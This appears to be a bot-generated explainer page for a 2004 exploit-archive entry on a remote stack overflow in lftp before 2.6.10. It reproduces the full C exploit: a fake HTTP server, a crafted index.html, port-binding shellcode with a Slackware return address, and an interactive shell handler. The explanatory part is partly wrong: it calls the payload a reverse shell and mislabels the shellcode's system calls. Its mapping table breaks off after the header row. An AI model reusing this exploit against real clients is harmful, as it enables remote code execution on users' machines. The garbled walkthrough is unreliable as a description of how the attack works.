By exploitdb papers bot•January 14, 2004•

papers

lftp 2.6.9 Remote Stack Overflow Exploit Explained

What this paper is

This paper presents a remote stack-based buffer overflow exploit for versions of lftp prior to 2.6.10. The vulnerability lies within the try_netscape_proxy() function in src/HttpDir.cc. The exploit works by tricking a vulnerable lftp client into connecting to a malicious server that serves a specially crafted index.html file. This file contains an <a> tag with a URL that triggers the overflow when lftp attempts to process it. The overflow allows an attacker to overwrite critical data on the stack, including the return address, to redirect program execution to a shellcode payload.

Simple technical breakdown

The core of the vulnerability is that the lftp client, when processing certain proxy configurations or URLs, doesn't properly validate the size of user-supplied data. This allows an attacker to send a string that is larger than the buffer allocated on the stack for it. When this oversized string is copied into the buffer, it spills over, overwriting adjacent memory.

The exploit uses a fake HTTP server to listen for connections from a vulnerable lftp client. When the client connects, the fake server sends back an HTML page containing a link. When the lftp client follows this link, it triggers the overflow. The exploit then redirects execution to shellcode, which in this case, is designed to establish a reverse shell connection back to the attacker's machine.

Key elements of the exploit:

Vulnerable Function: try_netscape_proxy() in lftp's HttpDir.cc.
Trigger: Processing a specially crafted URL or proxy configuration.
Exploitation Method: Stack buffer overflow.
Payload: Shellcode to establish a reverse shell.
Delivery Mechanism: A fake HTTP server and a crafted index.html file.

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break down its components:

Global Definitions and Shellcode

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

#define BUFFERSIZE 117 /*!*/
#define SIZE 256

#define D_BACK 26112 // Port for the reverse shell connection
#define D_RET 0xbffff770 // Default return address for Slackware 9.0
#define D_PORT 80 // Default port for the fake HTTP server

#define DUMMY1 0xbffff140 /*!*/ // Placeholder for stack padding
#define DUMMY2 0xbffff810 /*!*/ // Placeholder for stack padding

#define OK "cd ok, cwd=/\n" // Response for certain HTTP requests

BUFFERSIZE: Defines the size of the overflow buffer, set to 117 bytes. The /*!*/ comment indicates this value might need adjustment based on the target system.
SIZE: A general buffer size, likely for temporary storage.
D_BACK: The port on the attacker's machine that the reverse shell will connect to (26112).
D_RET: The default return address on the stack. This is crucial for redirecting execution. The value 0xbffff770 is specific to Slackware 9.0.
D_PORT: The default port for the fake HTTP server (80).
DUMMY1, DUMMY2: These are placeholder values used for padding on the stack. Their exact values are critical and often require debugging to determine. The /*!*/ comment suggests these might need tuning.
OK: A simple string used as a response in certain HTTP interactions.

/* Edited bighawk 78 bytes portbinding shellcode */
/* size: 80 bytes */
/* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */

char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";

shellcode: This is the actual payload. It's an 80-byte piece of machine code.
- The comments indicate it's an edited version of "bighawk's" shellcode, specifically designed to avoid whitespace characters (\r, \t, \v, \f, \n, \20). This is important because the exploit likely involves data being parsed by functions like sscanf which can be sensitive to these characters.
- Purpose of the shellcode (inferred from common shellcode patterns):
  - \x31\xdb\xf7\xe3: Likely xor ebx, ebx (zero out ebx).
  - \x53\x43\x53: Push registers.
  - \x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80: This sequence often corresponds to the socket() system call to create a new socket.
  - \x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1: Likely connect() system call to establish a connection to a remote host and port. The \x10 might be related to the port number (16, which is 0x10 in hex).
  - \x52\x50\xb0\x66\xcd\x80: Likely dup2() system call to redirect standard input, output, and error to the established socket.
  - \x89\xe1\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80: More dup2() calls or other setup for the shell.
  - \x89\xd9\x93\xb0\x3f\xcd\x80: Likely execve() system call to execute /bin/sh.
  - \x49\x79\xf9: This part is less immediately obvious without reverse engineering, but could be part of the execve arguments or loop.
  - \x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x28\x2c\x1d\xcd\x80: This is the string /bin/sh and potentially arguments for execve. The \x28\x2c\x1d are likely ASCII representations of characters that are part of the command or its arguments.

char badc0ded[] =
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00}; // Whitespace characters

badc0ded: An array containing common whitespace characters. The check_shellcode function iterates through the shellcode and compares each byte against this array. If a match is found, it prints an error, indicating the shellcode is not suitable for the exploit.

char *lftp_versions[] =
{
  "lftp/2.3",
  "lftp/2.4.9",
  "lftp/2.5.2",
  "lftp/2.6.0",
  "lftp/2.6.3",
  "lftp/2.6.4",
  "lftp/2.6.5",
  "lftp/2.6.6",
  "lftp/2.6.7",
  "lftp/2.6.8",
  "lftp/2.6.9",
   
}; // List of vulnerable lftp versions

lftp_versions: An array of strings representing known vulnerable versions of lftp. The check_version function uses this to determine if the client is vulnerable.

unsigned long ret_addr = D_RET; // Default return address

ret_addr: A global variable to store the target return address. It's initialized with D_RET.

Data Structures and Target Definitions

struct os_ret_addr
{
  int num;
  char *plat;
  long ret;
};

struct os_ret_addr exp_os[]=
{
  {0,"slack 9.0",0xbffff770},
  {0,NULL,0}
}; // Target operating system configurations

os_ret_addr: A structure to hold information about different target operating systems, specifically their platform name and the corresponding return address.
exp_os: An array of os_ret_addr structures. Currently, it only defines "slack 9.0" with the return address 0xbffff770. The NULL entry marks the end of the list.

Core Functions

`main(int argc, char *argv[])`

Purpose: Parses command-line arguments and initializes the exploit.
Inputs: argc (argument count), argv (argument values).
Behavior:
- Sets up opterr = 0 to disable default error reporting for getopt.
- Checks if any arguments are provided; if not, calls die() for usage instructions.
- Uses getopt to parse options:
  - -f <path>: Calls create_file() to generate an index.html file at the specified path. This is an alternative exploitation method where the attacker pre-creates the file.
  - -p <port>: Sets the port for the fake HTTP server. Validates the port range.
  - -r <ret>: Manually sets the return address. Validates the address range.
  - -t <target>: Selects a target platform from exp_os by its numerical index. If the index is invalid, it prints available platforms and exits.
- After parsing options, it calls wait_connection() to start the fake HTTP server.
Output: Returns 0 on successful execution, or exits via die() on error.

`check_shellcode(char *host)`

Purpose: Verifies that the shellcode does not contain any forbidden whitespace characters.
Inputs: host (string, likely the IP address of the target, used for error messages).
Behavior:
- Iterates through each byte of the shellcode.
- For each byte, it compares it against each character in the badc0ded array.
- If a match is found, it prints an error message and returns -1.
Output: 0 if the shellcode is clean, -1 if it contains forbidden characters.

`check_version(char *version)`

Purpose: Compares the provided version string against the list of known vulnerable lftp_versions.
Inputs: version (string, the lftp client's reported version).
Behavior:
- Iterates through the lftp_versions array.
- Uses strcmp to compare the input version with each entry.
- Prints "(vulnerable)." if a match is found.
- Prints "(not vulnerable)." if no match is found.
Output: Prints to stdout.

`build(char *host)`

Purpose: Constructs the malicious payload string that will be sent to the lftp client.
Inputs: host (string, likely the IP address of the target, used for logging).
Behavior:
- Allocates memory for the buffer (SIZE + 1).
- Initializes the buffer with 0x90 (NOP sled) up to BUFFERSIZE - strlen(shellcode). This NOP sled helps ensure that even if the exact landing spot on the stack varies slightly, the execution will slide down to the shellcode.
- Calls check_shellcode() to validate the shellcode. Exits if it's invalid.
- Appends the shellcode to the buffer.
- Appends padding values (DUMMY1, DUMMY2) to fill the stack space between the shellcode and the return address. These values are critical for overwriting other stack variables and saved registers before reaching the return address. The /*!*/ comments indicate these might need adjustment.
- Appends the ret_addr (the target return address) to overwrite the original return address on the stack.
- Appends another DUMMY2 value.
- Null-terminates the buffer.
Output: A dynamically allocated string containing the exploit payload.

`create_file(char *path)`

Purpose: Creates an index.html file at a specified path, containing a link that triggers the exploit. This is an alternative to running the fake HTTP server directly.
Inputs: path (string, the directory where the file should be created).
Behavior:
- Constructs the full file path by concatenating path and "index.html".
- Opens the file in write-only, create, and truncate mode.
- Constructs an HTML string using snprintf. This string includes an <a> tag with a URL that will cause the lftp client to connect to the attacker's machine (indicated by build("+")). The + is a placeholder for the host IP, which is not directly used here but passed to build.
- Writes the HTML string to the file.
- Closes the file.
Output: Creates an index.html file.

`back_connection(long host)`

Purpose: Establishes a reverse shell connection back to the attacker's machine once the shellcode is executed on the victim.
Inputs: host (long, the IP address of the attacker's machine).
Behavior:
- Creates a TCP socket.
- Sets up the sockaddr_in structure with the attacker's IP address and the D_BACK port.
- Connects to the attacker's machine.
- If the connection is successful, it sends a command (/bin/uname -a ; /usr/bin/id;\n) to get system information.
- Enters a loop to handle bidirectional communication between the attacker's console (stdin) and the victim's shell (via the socket). It uses select to monitor both stdin and the socket for activity.
Output: A reverse shell session.

`wait_connection(int port)`

Purpose: Sets up and runs a fake HTTP server to listen for incoming connections from vulnerable lftp clients.
Inputs: port (int, the port to listen on).
Behavior:
- Creates a TCP socket, binds it to the specified port (defaulting to 80), and starts listening.
- Enters an infinite loop to accept incoming connections.
- For each incoming connection, it forks a child process to handle the connection independently.
- The child process reads data from the client.
- It looks for the string "User-Agent: lftp" to identify lftp clients.
- If a HEAD request is detected, it sends back the OK response.
- If a GET request is detected:
  - It extracts the lftp version string from the User-Agent header.
  - It calls check_version() to report if the client is vulnerable.
  - It constructs an HTTP 200 OK response, including the malicious index.html content generated by build().
  - It sends the HTTP response to the client.
  - After sending the response, it resolves the client's IP address and calls back_connection() to initiate the reverse shell.
  - It sets a cancel flag to break the inner loop and exit the child process.
- The parent process continues listening for new connections.
Output: Listens for connections, serves crafted HTML, and initiates reverse shells.

`resolve_host(u_char *host_name)`

Purpose: Resolves a hostname or IP address string into an in_addr structure.
Inputs: host_name (u_char pointer, the hostname or IP address string).
Behavior:
- First, it tries to interpret host_name as an IP address using inet_addr.
- If inet_addr fails (returns -1), it uses gethostbyname to resolve the hostname.
- Copies the resolved address into the s_addr field of an in_addr structure.
Output: The IP address as a long integer, or 0 if resolution fails.

`die(char *argv)`

Purpose: Prints usage instructions and vulnerability information, then exits.
Inputs: argv (string, the name of the executable).
Behavior: Prints detailed usage information, lists supported targets, and provides contact information. Then, it exits the program.
Output: Prints to stdout and stderr, then exits.

Code Fragment -> Practical Purpose Mapping

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

/*
 * lftp remote stack-based overflow exploit by Li0n7 voila fr
 *
 * Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se
 *
 * Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based
 * overflow in try_netscape_proxy() and try_squid_eplf( (src/HttpDir.cc). This
 * bad coded proof-of-concept demonstrates the exploitation by exploiting the
 * vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs more targets
 * to be efficient. Please note that this vulnerability is really hard to exploit
 * since lots of parameters come into play and are different from a platform to another,
 * for we have to overwrite some variables and registers before overwriting eip.
 * With some time and lot of patience, you should find your own parameters by using
 * GDB. Params to edit are marked with a '!' in the POC code. Moreover, I have edited
 * Bighawk's port binding shellcode not to contain any white character such as \r,\t,\v,
 * \f,\n or \20 because we are exploiting a sscanf function.
 *
 * usage: ./lftp-exp [-f <path>][-p <port>][-r <ret>][-t <target>]
 * -f <path>: create <path>index.html
 * -p <port>: run a fake lftp server on port <port> (default: 80)
 * -r <ret>: return address you would like to use
 * -t <target>: choose the target among the platforms available
 * Platforms supported are:
 * num: 0 - slack 9.0 - 0xbffff770
 *
 * For instance: ./lftp-exp -p 80 -t 0
 * ./lftp-exp -f / -t 0
 *
 * A poil !
 */

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

#define BUFFERSIZE 117 /*!*/
#define SIZE 256

#define D_BACK 26112
#define D_RET 0xbffff770
#define D_PORT 80

#define DUMMY1 0xbffff140 /*!*/
#define DUMMY2 0xbffff810 /*!*/

#define OK "cd ok, cwd=/\n"


/* Edited bighawk 78 bytes portbinding shellcode */
/* size: 80 bytes */
/* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */

char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";

char badc0ded[] =
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};

char *lftp_versions[] =
{
  "lftp/2.3",
  "lftp/2.4.9",
  "lftp/2.5.2",
  "lftp/2.6.0",
  "lftp/2.6.3",
  "lftp/2.6.4",
  "lftp/2.6.5",
  "lftp/2.6.6",
  "lftp/2.6.7",
  "lftp/2.6.8",
  "lftp/2.6.9",
   
};

unsigned long ret_addr = D_RET;

int back_connection(long host);
int check_shellcode(char *host);
void check_version();
char * build(char *host);
int create_file(char *path);
void wait_connection(int port);
long resolve_host(u_char *host_name);
void die(char *argv);

struct os_ret_addr
{
  int num;
  char *plat;
  long ret;
};

struct os_ret_addr exp_os[]=
{
  {0,"slack 9.0",0xbffff770},
  {0,NULL,0}
};


int
main(int argc,char *argv[])
{
  int i, option, port = D_PORT;
  long host = 0;
  char * option_list = "f:p:r:t:", path[128];

  opterr = 0;

  if (argc < 2) die(argv[0]);
  while((option = getopt(argc,argv,option_list)) != -1)
    switch(option)
    {
      case 'f':
      strncpy(path,optarg,sizeof(path)-1);
      path[sizeof(path)-1] = '\0';
      create_file(path);
      return 0;
      case 'p':
      port = atoi(optarg);
      if(port > 65535 || port < 0) exit(-1);
      break;
      case 'r':
      ret_addr = atol(optarg);
      if(ret_addr > 0xbfffffff || ret_addr < 0x00000000) exit(1);
      break;
      case 't':
      for(i=0; exp_os[i].plat != NULL; i++)
      if(atoi(optarg) > i || atoi(optarg) < 0)
      {
        fprintf(stderr," Platforms supported are:\n");
        for(i=0; exp_os[i].plat != NULL; i++)
          fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
          exit(1);
      }
      ret_addr = exp_os[atoi(optarg)].ret;
      break;
      case '?':
      fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
      die(argv[0]);
    }
 
  wait_connection(port);
  return 0;
}


int
check_shellcode(char *host)
{
  int i,j;
  for(i=0;i<strlen(shellcode);i++)
    for(j=0;j<strlen(badc0ded);j++)
      if(shellcode[i] == badc0ded[j])
      {
      fprintf(stderr,"[%s] badc0ded shellcode!\n",host);
      return -1;
      }
  return 0;
}


void
check_version(char *version)
{
  int i;
  for(i=0;i<sizeof(lftp_versions);i++)
    if(!strcmp(lftp_versions[i],version))
    {
      fprintf(stdout,"(vulnerable).\n");
      return;
    }
  fprintf(stdout,"(not vulnerable).\n");
  return;
}


char
*build(char *host)
{
  char *buffer,*ptr;
  int i;
  unsigned long *addr_ptr;

  fprintf(stdout,"[%s] Building evil string to send (using ret 0x%x)...\n",host,ret_addr);

  buffer = (char *)malloc(SIZE+1);

  if(!buffer)
  {
    fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
    exit(1);
  }

  ptr = buffer;
  memset(ptr,0x90,BUFFERSIZE-strlen(shellcode));
  ptr += BUFFERSIZE-strlen(shellcode);

  if((i = check_shellcode(host)) < 0) exit(1);

  for(i=0;i<strlen(shellcode);i++)
    *ptr++ = shellcode[i];

  /* You might need to modify the padding too */
  addr_ptr = (long *)ptr;
  for(i=0;i<24;i++)
   *(addr_ptr++) = DUMMY1;
  for(i=0;i<8;i++)
   *(addr_ptr++) = DUMMY2;
  *(addr_ptr++) = ret_addr; /* EIP */
  *(addr_ptr++) = DUMMY2;

  ptr = (char *)addr_ptr;
  *ptr = 0x0;
  return buffer;
}


int
create_file(char *path)
{
  int fd;
  char buffer[512], file[256];
  ssize_t written;

  memset(file,0,256);
  memset(buffer,0,512);

  strcat(file,path);
  strcat(file,"index.html");

  fd = open(file,O_WRONLY | O_CREAT | O_TRUNC,0644);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  snprintf(buffer,512,"<a href=\"/\">empty</a> Fri May 30 10:09:06 2001 %s\n",build("+"));
  written = write(fd,buffer,512);
  if(written != 512)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  close(fd);
  fprintf(stdout,"[+] File %s successfuly created.\n",file);
  return 0;
}


int
back_connection(long host)
{
  struct sockaddr_in s;
  u_char sock_buf[4096];
  fd_set fds;
  int fd,size;
  char *command="/bin/uname -a ; /usr/bin/id;\n";

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(D_BACK);
  s.sin_addr.s_addr = host;

  if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    return 0;
  }

  fprintf(stdout, "[+] Let's rock on!\n");

  size = send(fd, command, strlen(command), 0);
  if(size < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    exit(1);
  }

  for (;;)
  {
    FD_ZERO(&fds);
    FD_SET(0, &fds);
    FD_SET(fd, &fds);

    if (select(255, &fds, NULL, NULL, NULL) == -1)
    {
      fprintf(stderr,"[-] %s\n",strerror(errno));
      close(fd);
      exit(1);
    }

    memset(sock_buf, 0, sizeof(sock_buf));

    if (FD_ISSET(fd, &fds))
    {
      if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
      {
      fprintf(stderr, "[-] Connection closed by remote host,exiting...\n");
      close(fd);
      exit(1);
      }

      fprintf(stderr, "%s", sock_buf);
    }

    if (FD_ISSET(0, &fds))
    {
      read(0, sock_buf, sizeof(sock_buf));
      write(fd, sock_buf, strlen(sock_buf));
    }
  }
  return 0;
}


void
wait_connection(int port)
{
  struct sockaddr_in s;
  int size, fd, fd2, i, r, cancel = 0;
  char data[1024], version[32], request[512];
  char *ptr;
  long host = 0;

  memset(data,0,1024);

  fprintf(stdout,"[+] Setting up a fake HTTP server...\n");
 
  fd = socket(AF_INET,SOCK_STREAM,0);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  s.sin_addr.s_addr = 0;

  bind(fd,(struct sockaddr *) &s,sizeof(s));
  listen(fd,1);
  size = sizeof(s);
  
  fprintf(stdout,"[+] Awaiting connection on port %i\n",port);

  while(1)
  {
    cancel = 0;
    fd2 = accept(fd,(struct sockaddr *) &s, &size);

    if(!fork())
    {
      close(fd);
      while(1)
      {
      memset(data,0,1024);
      r = read(fd2,data,1024);
      if((ptr = strstr(data,"User-Agent: lftp")) != NULL)
      {
        if(strstr(data,"HEAD"))
        {
          fprintf(stdout,"[%s] HEAD request received.\n",inet_ntoa(s.sin_addr));
          size = send(fd2, OK, strlen(OK), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
        }
        if(strstr(data,"GET"))
        {
          memset(request,0,512);
          memset(version,0,32);

          strncpy(version,ptr+12,10);
          version[sizeof(version)-1] = '\0';

          fprintf(stdout,"[%s] GET request received.\n",inet_ntoa(s.sin_addr));
          fprintf(stdout,"[%s] Remote version of lftp: %s ",inet_ntoa(s.sin_addr),version);
          check_version(version);

          snprintf(request,512,"HTTP/1.1 200 OK\n"
                 "Server: thttpd/2.21 20apr2001\n"
                 "Content-Type: text/html\n"
                 "Date: Sun, 21 Dec 2003 16:29:44 GMT\n"
                 "Last-Modified: Sun, 21 Dec 2003 16:23:41 GMT\n"
                 "Accept-Ranges: bytes\n"
                 "Connection: close\n\n"
                 "<a href=\"/\">empty</a>\tFri May 30 10:09:06 2001 %s\n",build((char*)inet_ntoa(s.sin_addr)));

          size = send(fd2, request, strlen(request), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
          sleep(2);
          host = resolve_host((char *)inet_ntoa(s.sin_addr));
          back_connection(host);
          cancel = 1;
          break;
        }
      }
      }
      if(cancel == 1) break;
    }
    close(fd2);
  }
  return;
}


long resolve_host(u_char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;

  addr.s_addr = inet_addr(host_name);
  if (addr.s_addr == -1)
  {
    host_ent = gethostbyname(host_name);
    if (!host_ent) return(0);
    memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  }

  return(addr.s_addr);
}


void
die(char *argv)
{
  int i;
  fprintf(stdout,"\t Remote exploit for lftp < 2.6.10 by Li0n7 \n");
  fprintf(stdout,"\n usage: %s [-f <path>][-p <port>][-r <ret>][-t <target>]\n",argv);
  fprintf(stdout," -f <path>: create <path>index.html\n");
  fprintf(stdout," -p <port>: run a fake lftp server on port <port> (default: 80)\n");
  fprintf(stdout," -r <ret>: return address you would like to use\n");
  fprintf(stdout," -t <target>: choose the target among the platforms available\n");
  fprintf(stdout," Platforms supported are:\n");
  for(i=0; exp_os[i].plat != NULL; i++)
    fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
  fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se> \n");
  fprintf(stdout," Contact me: Li0n7@voila.fr\n\n");
  exit(1);
}


// milw0rm.com [2004-01-14]